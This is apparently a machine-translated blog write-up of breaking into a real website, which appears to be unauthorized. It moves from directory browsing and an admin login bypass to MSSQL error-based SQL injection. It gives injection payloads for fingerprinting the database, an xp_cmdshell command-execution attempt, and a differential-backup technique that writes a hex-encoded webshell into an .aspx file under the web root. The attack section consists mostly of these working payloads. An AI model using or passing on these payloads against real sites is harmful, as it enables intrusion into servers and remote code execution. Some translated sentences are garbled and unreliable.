One differential backup take the shell process

0x00 Preface

Scanner Scan to a website exists directory browsing, so there is this article ...

Knowledge Point Popular Science:

1. Directory browsing

Directory browsing in my personal view is a significant vulnerability, the vulnerability is "in the absence of a default document directory, all file names and files in this directory," if the site has such a misconfiguration, if the attacker knows the directory name, you can view the files under these directories.

2. Differential backup conditions

1. Site Absolute Path
2. Have path Write permission
3. Have current database permissions

0X01 body

Improper configuration of the site, resulting in directory browsing, by looking at the first page of the source code, turned to several directories


Random access to the one, the discovery will error, indicating that the webmaster did not block the error message

There is also an information leak.

But usually the files in the directory need to pass parameters to execute, we do not know the parameter name, so there is no way to use

Go back to the front desk login screen to view

Try to find the password at the presence of injection and weak password admin, that is, you can log in with a universal password
Originally wanted to find a file upload, direct Getshell, but found that does not exist, but found that the site used kindeditor and site absolute path

Then there is injection at the front of the login port, the background is generally also a lot of injections, try to find, if there is, with the absolute path can be Getshell

Okok, found injected, but so far do not know what type of database, General Aspx+mssql, because the previous discovery can be an error, then try to use MSSQL error mode

%‘ and [email protected]@version --a

MSSQL database, check the current user identity

%‘ and 1=user --a

The dbo permission is not SA, try Xp_cmdshell

%‘;exec(‘master..xp_cmdshell whoami‘) --a

xp_cmdshell is not turned on, and dbo's permissions are not sufficient to open xp_cmdshell, you can only try to write a Webshell by using a differential backup

1. Get the current database name

%‘ and 1=db_name() --a

2. Backing up the current database

If the backup is successful, the Web page returns the query result of% ' (because it is stacked and the execution of subsequent statements does not return results)

3. Create a table and write to Webshell

%‘;create table cmd(a image) --a%‘;insert into cmd(a) values (0xxxxx) --a  //webshell的hex值

Can use the tools of the Internet, the author used to develop their own gadgets

4. Make a second backup

%‘;backup log 数据库名称 to disk = ‘绝对路径\\abc.aspx‘--

Here I will write the Webshell to the subdirectory, because there is a directory browsing, can see exactly whether the file generated

After a successful creation, try to connect

0x02 Follow-up

1. If you can use xp_cmdshell directly, try not to use differential backup, because the backup file will be generated, if the database is large, it will affect
   
2. Have any errors, please treatise

One differential backup take the shell process